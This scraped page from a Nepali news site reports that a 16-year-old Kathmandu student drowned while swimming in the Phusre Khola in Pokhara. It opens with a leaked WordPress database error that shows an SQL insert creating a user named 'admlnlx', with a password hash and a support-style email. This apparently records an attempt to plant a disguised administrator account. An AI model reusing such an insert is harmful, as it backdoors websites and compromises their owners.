WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bqlb67CU5/B.DC907HwCLAMBbTQU/f0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:13:21', '', 'admlnlx', 'admlnlx')
पोखरा, माघ २१-
पोखरा– १७ पावर हाउसस्थित फुस्रे खोलामा बेपत्ता एक विद्यार्थीको शव आज बिहान फेला परेको बैदामस्थित वडा प्रहरी कार्यालयले जनाएको छ ।
भ्याली पब्लिक स्कुल काठमाडौँबाट पोखरा भ्रमणमा आएका वर्ष १६ का पेशल घिमिरे आफ्ना केही साथीसहित फुस्रे खोलामा पौडी खेल्ने क्रममा हिजो बेपत्ता भएका थिए । मृतक घिमिरेको शव परीक्षणका लागि पश्चिमान्चल क्षेत्रीय अस्पतालमा पठाइएको छ ।- रासस